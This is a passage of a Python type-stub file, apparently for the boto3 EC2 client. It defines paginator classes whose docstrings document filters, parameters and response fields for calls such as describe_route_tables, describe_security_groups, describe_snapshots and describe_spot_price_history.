        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_public_ipv4_pools`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribePublicIpv4Pools>`_

        :type PoolIds: list
        :param PoolIds:
          The IDs of the address pools (strings).
        :type PaginationConfig: dict
        :param PaginationConfig:
          Pagination controls: ``MaxItems`` (integer, total number of items to
          return; a ``NextToken`` is provided in the output when more items are
          available), ``PageSize`` (integer, size of each page) and
          ``StartingToken`` (string, the ``NextToken`` from a previous
          response).
        :rtype: dict
        :returns:
          A dict containing a ``PublicIpv4Pools`` list. Each entry describes
          one address pool: ``PoolId`` (string, the ID of the IPv4 address
          pool), ``Description`` (string), ``PoolAddressRanges`` (list of
          dicts, each with ``FirstAddress`` and ``LastAddress`` (strings) plus
          ``AddressCount`` and ``AvailableAddressCount`` (integers)),
          ``TotalAddressCount`` (integer) and ``TotalAvailableAddressCount``
          (integer).
        """
        pass
class DescribeReservedInstancesModifications(Paginator):
    def paginate(self, Filters: List = None, ReservedInstancesModificationIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_reserved_instances_modifications`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeReservedInstancesModifications>`_

        :type Filters: list
        :param Filters:
          One or more filters, each a dict with a case-sensitive ``Name``
          (string) and ``Values`` (list of strings). Supported filter names:
          * ``client-token`` - The idempotency token for the modification request.
          * ``create-date`` - The time when the modification request was created.
          * ``effective-date`` - The time when the modification becomes effective.
          * ``modification-result.reserved-instances-id`` - The ID for the Reserved Instances created as part of the modification request. This ID is only available when the status of the modification is ``fulfilled``.
          * ``modification-result.target-configuration.availability-zone`` - The Availability Zone for the new Reserved Instances.
          * ``modification-result.target-configuration.instance-count`` - The number of new Reserved Instances.
          * ``modification-result.target-configuration.instance-type`` - The instance type of the new Reserved Instances.
          * ``modification-result.target-configuration.platform`` - The network platform of the new Reserved Instances (``EC2-Classic`` | ``EC2-VPC``).
          * ``reserved-instances-id`` - The ID of the Reserved Instances modified.
          * ``reserved-instances-modification-id`` - The ID of the modification request.
          * ``status`` - The status of the Reserved Instances modification request (``processing`` | ``fulfilled`` | ``failed``).
          * ``status-message`` - The reason for the status.
          * ``update-date`` - The time when the modification request was last updated.
        :type ReservedInstancesModificationIds: list
        :param ReservedInstancesModificationIds:
          IDs for the submitted modification request (strings).
        :type PaginationConfig: dict
        :param PaginationConfig:
          Pagination controls: ``MaxItems`` (integer, total number of items to
          return; a ``NextToken`` is provided in the output when more items are
          available), ``PageSize`` (integer, size of each page) and
          ``StartingToken`` (string, the ``NextToken`` from a previous
          response).
        :rtype: dict
        :returns:
          A dict containing a ``ReservedInstancesModifications`` list. Each
          entry describes one Reserved Instance modification:
          * ``ClientToken`` *(string)* - A unique, case-sensitive key supplied by the client to ensure that the request is idempotent. For more information, see `Ensuring Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/Run_Instance_Idempotency.html>`__.
          * ``CreateDate`` / ``EffectiveDate`` / ``UpdateDate`` *(datetimes)* - When the request was created, when it becomes effective, and when it was last updated.
          * ``ModificationResults`` *(list of dicts)* - Target configurations with their corresponding new Reserved Instance IDs. Each has ``ReservedInstancesId`` (string, only available once the modification is fulfilled) and ``TargetConfiguration`` (dict with ``AvailabilityZone`` (string), ``InstanceCount`` (integer, required on a request), ``InstanceType`` (one of the EC2 instance-type identifiers, e.g. ``'t2.micro'``, ``'m5.large'``, ``'c5.xlarge'``), ``Platform`` (string, ``EC2-Classic`` or ``EC2-VPC``) and ``Scope`` (``'Availability Zone'`` | ``'Region'``)).
          * ``ReservedInstancesIds`` *(list of dicts)* - Each with ``ReservedInstancesId`` (string).
          * ``ReservedInstancesModificationId`` *(string)* - A unique ID for the modification.
          * ``Status`` / ``StatusMessage`` *(strings)* - Request status and the reason for the status.
        """
        pass
class DescribeReservedInstancesOfferings(Paginator):
    def paginate(self, AvailabilityZone: str = None, Filters: List = None, IncludeMarketplace: bool = None, InstanceType: str = None, MaxDuration: int = None, MaxInstanceCount: int = None, MinDuration: int = None, OfferingClass: str = None, ProductDescription: str = None, ReservedInstancesOfferingIds: List = None, DryRun: bool = None, InstanceTenancy: str = None, OfferingType: str = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_reserved_instances_offerings`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeReservedInstancesOfferings>`_

        Each page of the response contains a ``ReservedInstancesOfferings`` list; every
        entry describes one Reserved Instance offering (availability zone, duration,
        fixed/usage price, instance type, product description, offering ID, currency
        code, tenancy, marketplace flag, offering class/type, pricing details,
        recurring charges, and scope).

        :type AvailabilityZone: string
        :param AvailabilityZone: The Availability Zone in which the Reserved Instance can be used.
        :type Filters: list
        :param Filters: One or more filters, each a dict with ``Name`` (string) and
            ``Values`` (list of strings). Supported filter names include
            ``availability-zone``, ``duration``, ``fixed-price``, ``instance-type``,
            ``marketplace``, ``product-description``, ``reserved-instances-offering-id``,
            ``scope``, and ``usage-price``. Filter names and values are case-sensitive.
        :type IncludeMarketplace: boolean
        :param IncludeMarketplace: Include Reserved Instance Marketplace offerings in the response.
        :type InstanceType: string
        :param InstanceType: The instance type that the reservation will cover (for
            example, ``m1.small``). See `Instance Types
            <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html>`__
            in the *Amazon Elastic Compute Cloud User Guide*.
        :type MaxDuration: integer
        :param MaxDuration: The maximum duration (in seconds) to filter when searching
            for offerings. Default: 94608000 (3 years).
        :type MaxInstanceCount: integer
        :param MaxInstanceCount: The maximum number of instances to filter when
            searching for offerings. Default: 20.
        :type MinDuration: integer
        :param MinDuration: The minimum duration (in seconds) to filter when searching
            for offerings. Default: 2592000 (1 month).
        :type OfferingClass: string
        :param OfferingClass: The offering class of the Reserved Instance. Can be
            ``standard`` or ``convertible``.
        :type ProductDescription: string
        :param ProductDescription: The Reserved Instance product platform description.
            Instances that include ``(Amazon VPC)`` in the description are for use with
            Amazon VPC.
        :type ReservedInstancesOfferingIds: list
        :param ReservedInstancesOfferingIds: One or more Reserved Instances offering IDs (strings).
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the action
            without actually making the request. With permission the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type InstanceTenancy: string
        :param InstanceTenancy: The tenancy of the instances covered by the
            reservation. Only ``default`` or ``dedicated`` may be used here; the
            ``host`` value cannot be used with this parameter. Default: ``default``.
        :type OfferingType: string
        :param OfferingType: The Reserved Instance offering type. Tools predating the
            2011-11-01 API version only have access to ``Medium Utilization``.
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (integer total to
            return; a ``NextToken`` is provided when more are available), ``PageSize``
            (integer size of each page), and ``StartingToken`` (string ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: A page of results containing ``ReservedInstancesOfferings``.
        """
        pass
class DescribeRouteTables(Paginator):
    def paginate(self, Filters: List = None, DryRun: bool = None, RouteTableIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_route_tables`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeRouteTables>`_

        Each page of the response contains a ``RouteTables`` list; every entry
        describes one route table: its subnet associations (``Main`` flag,
        association/route-table/subnet IDs), propagating virtual private gateways,
        the routes themselves (destination CIDR/prefix, target gateway / instance /
        NAT gateway / transit gateway / network interface / peering connection,
        ``Origin``, and ``State`` of ``active`` or ``blackhole``), any tags, the VPC
        ID, and the owning account ID.

        :type Filters: list
        :param Filters: One or more filters, each a dict with ``Name`` (string) and
            ``Values`` (list of strings). Supported filter names include
            ``association.route-table-association-id``, ``association.route-table-id``,
            ``association.subnet-id``, ``association.main``, ``owner-id``,
            ``route-table-id``, ``route.destination-cidr-block``,
            ``route.destination-ipv6-cidr-block``, ``route.destination-prefix-list-id``,
            ``route.egress-only-internet-gateway-id``, ``route.gateway-id``,
            ``route.instance-id``, ``route.nat-gateway-id``, ``route.transit-gateway-id``,
            ``route.origin``, ``route.state``, ``route.vpc-peering-connection-id``,
            ``tag:<key>``, ``tag-key``, ``transit-gateway-id``, and ``vpc-id``.
            Filter names and values are case-sensitive.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the action
            without actually making the request. With permission the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type RouteTableIds: list
        :param RouteTableIds: One or more route table IDs (strings). Default:
            describes all your route tables.
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (integer total to
            return; a ``NextToken`` is provided when more are available), ``PageSize``
            (integer size of each page), and ``StartingToken`` (string ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: A page of results containing ``RouteTables``.
        """
        pass
class DescribeScheduledInstanceAvailability(Paginator):
    def paginate(self, FirstSlotStartTimeRange: Dict, Recurrence: Dict, DryRun: bool = None, Filters: List = None, MaxSlotDurationInHours: int = None, MinSlotDurationInHours: int = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_scheduled_instance_availability`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeScheduledInstanceAvailability>`_

        Each page of the response contains a ``ScheduledInstanceAvailabilitySet``
        list; every entry describes an available Scheduled Instance schedule
        (availability zone, available instance count, first slot start time, hourly
        price, instance type, min/max term durations in days, network platform,
        platform, purchase token, recurrence, slot duration, and total scheduled
        instance hours).

        :type FirstSlotStartTimeRange: dict
        :param FirstSlotStartTimeRange: **[REQUIRED]** The time period for the first
            schedule to start.

            - ``EarliestTime`` *(datetime, REQUIRED)* -- The earliest date and time,
              in UTC, for the Scheduled Instance to start.
            - ``LatestTime`` *(datetime, REQUIRED)* -- The latest date and time, in
              UTC, for the Scheduled Instance to start. Must be later than or equal
              to the earliest date and at most three months in the future.
        :type Recurrence: dict
        :param Recurrence: **[REQUIRED]** The schedule recurrence.

            - ``Frequency`` *(string)* -- ``Daily``, ``Weekly``, or ``Monthly``.
            - ``Interval`` *(integer)* -- The interval quantity; its unit depends on
              ``Frequency`` (for example, every 2 weeks or every 2 months).
            - ``OccurrenceDays`` *(list of integers)* -- Days of the month (1-31) for
              a monthly schedule, or days of the week (1-7, where 1 is Sunday) for a
              weekly schedule. Not valid with a daily schedule; only a single day may
              be given when the occurrence is relative to the end of the month.
            - ``OccurrenceRelativeToEnd`` *(boolean)* -- Whether the occurrence is
              relative to the end of the specified week or month. Not valid with a
              daily schedule.
            - ``OccurrenceUnit`` *(string)* -- ``DayOfWeek`` or ``DayOfMonth``;
              required for a monthly schedule, ``DayOfWeek`` not valid with a weekly
              schedule, and neither valid with a daily schedule.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the action
            without actually making the request. With permission the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters: Filters, each a dict with ``Name`` (string) and ``Values``
            (list of strings). Supported filter names: ``availability-zone``,
            ``instance-type``, ``network-platform``, and ``platform``. Filter names
            and values are case-sensitive.
        :type MaxSlotDurationInHours: integer
        :param MaxSlotDurationInHours: The maximum available duration, in hours. Must
            be greater than ``MinSlotDurationInHours`` and less than 1,720.
        :type MinSlotDurationInHours: integer
        :param MinSlotDurationInHours: The minimum available duration, in hours. The
            minimum required duration is 1,200 hours per year (for example, 4 hours
            daily, 24 hours weekly, or 100 hours monthly).
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (integer total to
            return; a ``NextToken`` is provided when more are available), ``PageSize``
            (integer size of each page), and ``StartingToken`` (string ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: A page of results containing ``ScheduledInstanceAvailabilitySet``.
        """
        pass
class DescribeScheduledInstances(Paginator):
    def paginate(self, DryRun: bool = None, Filters: List = None, ScheduledInstanceIds: List = None, SlotStartTimeRange: Dict = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_scheduled_instances`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeScheduledInstances>`_

        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters:
            The filters. Each element is a dict with ``Name`` *(string)* and
            ``Values`` *(list of strings)*; filter names and values are
            case-sensitive. Supported names: ``availability-zone`` (for
            example, ``us-west-2a``), ``instance-type`` (for example,
            ``c4.large``), ``network-platform`` (``EC2-Classic`` or
            ``EC2-VPC``), and ``platform`` (``Linux/UNIX`` or ``Windows``).
        :type ScheduledInstanceIds: list
        :param ScheduledInstanceIds:
            The Scheduled Instance IDs, each a string.
        :type SlotStartTimeRange: dict
        :param SlotStartTimeRange:
            The time period for the first schedule to start, with
            ``EarliestTime`` and ``LatestTime`` *(datetime)* keys giving the
            earliest and latest date and time, in UTC, for the Scheduled
            Instance to start.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` *(integer)* — total number of
            items to return (a ``NextToken`` is provided in the output when
            more are available); ``PageSize`` *(integer)* — the size of each
            page; ``StartingToken`` *(string)* — the ``NextToken`` from a
            previous response, to resume pagination.
        :rtype: dict
        :returns:
            A page with a ``ScheduledInstanceSet`` list; each element
            describes one Scheduled Instance (``AvailabilityZone``,
            ``CreateDate``, ``HourlyPrice``, ``InstanceCount``,
            ``InstanceType``, ``NetworkPlatform``, ``NextSlotStartTime``,
            ``Platform``, ``PreviousSlotEndTime``, ``Recurrence`` — a dict of
            ``Frequency``, ``Interval``, ``OccurrenceDaySet``,
            ``OccurrenceRelativeToEnd``, ``OccurrenceUnit`` —,
            ``ScheduledInstanceId``, ``SlotDurationInHours``, ``TermEndDate``,
            ``TermStartDate``, and ``TotalScheduledInstanceHours``).
        """
class DescribeSecurityGroups(Paginator):
    def paginate(self, Filters: List = None, GroupIds: List = None, GroupNames: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_security_groups`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSecurityGroups>`_

        :type Filters: list
        :param Filters:
            The filters. Each element is a dict with ``Name`` *(string)* and
            ``Values`` *(list of strings)*; filter names and values are
            case-sensitive. If multiple filters are used for rules, the
            results include security groups for which any combination of
            rules — not necessarily a single rule — match all filters.
            Supported names include ``description``, ``group-id``,
            ``group-name``, ``owner-id``, ``vpc-id``, ``tag``:<key>,
            ``tag-key``, and the inbound/outbound rule filters
            ``ip-permission.*`` and ``egress.ip-permission.*`` (``cidr``,
            ``from-port``, ``group-id``, ``group-name``, ``ipv6-cidr``,
            ``prefix-list-id``, ``protocol``, ``to-port``, ``user-id``).
        :type GroupIds: list
        :param GroupIds:
            The IDs of the security groups. Required for security groups in a
            nondefault VPC. Default: describes all your security groups.
        :type GroupNames: list
        :param GroupNames:
            [EC2-Classic and default VPC only] The names of the security
            groups. You can specify either the security group name or ID; for
            groups in a nondefault VPC, use the ``group-name`` filter instead.
            Default: describes all your security groups.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` *(integer)* — total number of
            items to return (a ``NextToken`` is provided in the output when
            more are available); ``PageSize`` *(integer)* — the size of each
            page; ``StartingToken`` *(string)* — the ``NextToken`` from a
            previous response, to resume pagination.
        :rtype: dict
        :returns:
            A page with a ``SecurityGroups`` list; each element describes one
            security group (``Description``, ``GroupName``, ``GroupId``,
            ``OwnerId``, ``VpcId``, ``Tags``) together with its inbound
            ``IpPermissions`` and [VPC only] outbound ``IpPermissionsEgress``
            rule sets. Each rule carries ``IpProtocol``, ``FromPort``,
            ``ToPort``, and lists of ``IpRanges`` (IPv4 CIDRs),
            ``Ipv6Ranges``, ``PrefixListIds``, and ``UserIdGroupPairs``
            (referenced security group / AWS account ID pairs, with
            ``PeeringStatus``, ``VpcId``, and ``VpcPeeringConnectionId``
            when applicable).
        """
class DescribeSnapshots(Paginator):
    def paginate(self, Filters: List = None, OwnerIds: List = None, RestorableByUserIds: List = None, SnapshotIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_snapshots`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSnapshots>`_

        :type Filters: list
        :param Filters:
            The filters. Each element is a dict with ``Name`` *(string)* and
            ``Values`` *(list of strings)*; filter names and values are
            case-sensitive. Supported names: ``description``, ``encrypted``
            (``true`` | ``false``), ``owner-alias`` (``amazon`` | ``self`` |
            ``all`` | ``aws-marketplace`` | ``microsoft``), ``owner-id``,
            ``progress`` (for example, 80%), ``snapshot-id``, ``start-time``,
            ``status`` (``pending`` | ``completed`` | ``error``),
            ``tag``:<key>, ``tag-key``, ``volume-id``, and ``volume-size``.
        :type OwnerIds: list
        :param OwnerIds:
            Describes the snapshots owned by these owners.
        :type RestorableByUserIds: list
        :param RestorableByUserIds:
            The IDs of the AWS accounts that can create volumes from the
            snapshot.
        :type SnapshotIds: list
        :param SnapshotIds:
            The snapshot IDs. Default: describes the snapshots for which you
            have create volume permissions.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` *(integer)* — total number of
            items to return (a ``NextToken`` is provided in the output when
            more are available); ``PageSize`` *(integer)* — the size of each
            page; ``StartingToken`` *(string)* — the ``NextToken`` from a
            previous response, to resume pagination.
        :rtype: dict
        :returns:
            A page with a ``Snapshots`` list; each element describes one
            snapshot: ``SnapshotId``, ``Description``, ``Encrypted``,
            ``KmsKeyId`` (the AWS KMS CMK ARN used to protect the parent
            volume's encryption key), ``DataEncryptionKeyId`` (shared by
            snapshots in the same volume/snapshot lineage), ``OwnerId``,
            ``OwnerAlias``, ``Progress`` (a percentage), ``StartTime``,
            ``State`` (``pending`` | ``completed`` | ``error``),
            ``StateMessage`` (error-state details for failed encrypted
            copies), ``VolumeId`` (arbitrary for CopySnapshot-created
            snapshots), ``VolumeSize`` (GiB), and ``Tags``.
        """
class DescribeSpotFleetInstances(Paginator):
    def paginate(self, SpotFleetRequestId: str, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_spot_fleet_instances`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotFleetInstances>`_

        :type SpotFleetRequestId: string
        :param SpotFleetRequestId: **[REQUIRED]**
            The ID of the Spot Fleet request.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` *(integer)* — total number of
            items to return (a ``NextToken`` is provided in the output when
            more are available); ``PageSize`` *(integer)* — the size of each
            page; ``StartingToken`` *(string)* — the ``NextToken`` from a
            previous response, to resume pagination.
        :rtype: dict
        :returns:
            A page with the echoed ``SpotFleetRequestId`` and an
            ``ActiveInstances`` list (refreshed periodically and possibly out
            of date). Each element describes a running instance in the Spot
            Fleet: ``InstanceId``, ``InstanceType``,
            ``SpotInstanceRequestId``, and ``InstanceHealth`` (``healthy`` |
            ``unhealthy``; ``unhealthy`` when either the instance status
            check or the system status check is ``impaired``).
        """
class DescribeSpotFleetRequests(Paginator):
    def paginate(self, DryRun: bool = None, SpotFleetRequestIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_spot_fleet_requests`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotFleetRequests>`_

        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              SpotFleetRequestIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )

        **Response Structure**
        Each page is a dict containing the output of DescribeSpotFleetRequests:

        - **SpotFleetRequestConfigs** *(list) --* Information about the configuration of
          your Spot Fleet. Each element is a dict describing one Spot Fleet request:

          - **ActivityStatus** *(string) --* The progress of the Spot Fleet request:
            ``'error'|'pending_fulfillment'|'pending_termination'|'fulfilled'``.
          - **CreateTime** *(datetime) --* The creation date and time of the request.
          - **SpotFleetRequestConfig** *(dict) --* The configuration of the Spot Fleet
            request, including:

            - **AllocationStrategy** / **OnDemandAllocationStrategy** *(string) --* How
              target capacity is allocated across Spot pools / On-Demand overrides.
            - **ClientToken** *(string) --* Idempotency token for the request.
            - **ExcessCapacityTerminationPolicy** *(string) --* ``'noTermination'|'default'``.
            - **FulfilledCapacity** / **OnDemandFulfilledCapacity** *(float) --* Units
              fulfilled compared to the target capacity.
            - **IamFleetRole** *(string) --* Role granting Spot Fleet permission to
              terminate instances on your behalf.
            - **LaunchSpecifications** *(list) --* Launch specifications (security
              groups, block device mappings, EBS settings, IAM instance profile,
              image/instance/kernel/key identifiers, monitoring, network interfaces,
              placement, ramdisk, Spot price, subnet, user data, weighted capacity,
              and tag specifications). Mutually exclusive with
              ``LaunchTemplateConfigs``.
            - **LaunchTemplateConfigs** *(list) --* Launch template (id/name/version)
              plus per-override instance type, Spot price, subnet, Availability Zone,
              weighted capacity, and priority. Mutually exclusive with
              ``LaunchSpecifications``.
            - **SpotPrice** *(string) --* Maximum price per unit hour; defaults to the
              On-Demand price.
            - **TargetCapacity** / **OnDemandTargetCapacity** *(integer) --* Number of
              units requested.
            - **TerminateInstancesWithExpiration** *(boolean) --* Whether running Spot
              Instances are terminated when the request expires.
            - **Type** *(string) --* ``'request'|'maintain'|'instant'``.
            - **ValidFrom** / **ValidUntil** *(datetime) --* Start and end date/time of
              the request, in UTC.
            - **ReplaceUnhealthyInstances** *(boolean) --* Whether Spot Fleet replaces
              unhealthy instances.
            - **InstanceInterruptionBehavior** *(string) --*
              ``'hibernate'|'stop'|'terminate'``.
            - **LoadBalancersConfig** *(dict) --* Classic Load Balancers and target
              groups to attach to the fleet.
            - **InstancePoolsToUseCount** *(integer) --* Number of Spot pools across
              which to allocate target Spot capacity (``lowest-price`` strategy only).
          - **SpotFleetRequestId** *(string) --* The ID of the Spot Fleet request.
          - **SpotFleetRequestState** *(string) --*
            ``'submitted'|'active'|'cancelled'|'failed'|'cancelled_running'|'cancelled_terminating'|'modifying'``.

        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type SpotFleetRequestIds: list
        :param SpotFleetRequestIds:
          The IDs of the Spot Fleet requests.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        # Stub only: the real implementation is provided by botocore at runtime.
        pass
class DescribeSpotInstanceRequests(Paginator):
    def paginate(self, Filters: List = None, DryRun: bool = None, SpotInstanceRequestIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates responses from
        :py:meth:`EC2.Client.describe_spot_instance_requests`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotInstanceRequests>`_

        :type Filters: list
        :param Filters:
            One or more filters, each a dict with ``Name`` (string) and
            ``Values`` (list of strings) keys. Filter names are
            case-sensitive; supported names include
            ``availability-zone-group``, ``create-time``, ``fault-code``,
            ``fault-message``, ``instance-id``, ``launch-group``,
            ``launch.block-device-mapping.*``, ``launch.group-id``,
            ``launch.group-name``, ``launch.image-id``,
            ``launch.instance-type``, ``launch.kernel-id``,
            ``launch.key-name``, ``launch.monitoring-enabled``,
            ``launch.ramdisk-id``, ``launched-availability-zone``,
            ``network-interface.*``, ``product-description``,
            ``spot-instance-request-id``, ``spot-price``, ``state``,
            ``status-code``, ``status-message``, ``tag:<key>``, ``tag-key``,
            ``type``, ``valid-from``, and ``valid-until``.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type SpotInstanceRequestIds: list
        :param SpotInstanceRequestIds:
            One or more Spot Instance request IDs (strings).
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that controls pagination: ``MaxItems`` (integer,
            total number of items to return; a ``NextToken`` is provided in
            the output when more items are available), ``PageSize`` (integer,
            the size of each page), and ``StartingToken`` (string, the
            ``NextToken`` from a previous response).
        :rtype: dict
        :returns:
            A page of results containing a ``SpotInstanceRequests`` key: a
            list of dicts, one per Spot Instance request, with fields such as
            ``ActualBlockHourlyPrice``, ``AvailabilityZoneGroup``,
            ``BlockDurationMinutes``, ``CreateTime``, ``Fault``,
            ``InstanceId``, ``LaunchGroup``, ``LaunchSpecification``
            (security groups, block device mappings, instance type, network
            interfaces, placement, monitoring, etc.),
            ``LaunchedAvailabilityZone``, ``ProductDescription``,
            ``SpotInstanceRequestId``, ``SpotPrice``, ``State``, ``Status``,
            ``Tags``, ``Type``, ``ValidFrom``, ``ValidUntil``, and
            ``InstanceInterruptionBehavior``.
        """
class DescribeSpotPriceHistory(Paginator):
    def paginate(self, Filters: List = None, AvailabilityZone: str = None, DryRun: bool = None, EndTime: datetime = None, InstanceTypes: List = None, ProductDescriptions: List = None, StartTime: datetime = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates responses from
        :py:meth:`EC2.Client.describe_spot_price_history`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotPriceHistory>`_

        :type Filters: list
        :param Filters:
            One or more filters, each a dict with ``Name`` (string) and
            ``Values`` (list of strings) keys. Filter names are
            case-sensitive; supported names are ``availability-zone``,
            ``instance-type``, ``product-description`` (``Linux/UNIX`` |
            ``SUSE Linux`` | ``Windows`` | ``Linux/UNIX (Amazon VPC)`` |
            ``SUSE Linux (Amazon VPC)`` | ``Windows (Amazon VPC)``),
            ``spot-price`` (exact match or wildcards; greater/less-than
            comparison is not supported), and ``timestamp`` (UTC format,
            wildcards * and ? allowed; greater/less-than comparison is not
            supported).
        :type AvailabilityZone: string
        :param AvailabilityZone:
            Filters the results by the specified Availability Zone.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type EndTime: datetime
        :param EndTime:
            The date and time, up to the current date, from which to stop
            retrieving the price history data, in UTC format (for example,
            *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
        :type InstanceTypes: list
        :param InstanceTypes:
            Filters the results by the specified instance types (strings,
            e.g. ``'m5.large'``).
        :type ProductDescriptions: list
        :param ProductDescriptions:
            Filters the results by the specified basic product descriptions
            (strings).
        :type StartTime: datetime
        :param StartTime:
            The date and time, up to the past 90 days, from which to start
            retrieving the price history data, in UTC format (for example,
            *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that controls pagination: ``MaxItems`` (integer,
            total number of items to return; a ``NextToken`` is provided in
            the output when more items are available), ``PageSize`` (integer,
            the size of each page), and ``StartingToken`` (string, the
            ``NextToken`` from a previous response).
        :rtype: dict
        :returns:
            A page of results containing a ``SpotPriceHistory`` key: a list
            of dicts, each with ``AvailabilityZone`` (string),
            ``InstanceType`` (string), ``ProductDescription`` (string),
            ``SpotPrice`` (string — the maximum price per hour that you are
            willing to pay for a Spot Instance), and ``Timestamp``
            (datetime, UTC).
        """
class DescribeStaleSecurityGroups(Paginator):
    def paginate(self, VpcId: str, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate over the results of :py:meth:`EC2.Client.describe_stale_security_groups`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeStaleSecurityGroups>`_

        :type VpcId: string
        :param VpcId: **[REQUIRED]** The ID of the VPC.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action without actually making the request. With the required
            permissions the error response is ``DryRunOperation``; otherwise it
            is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
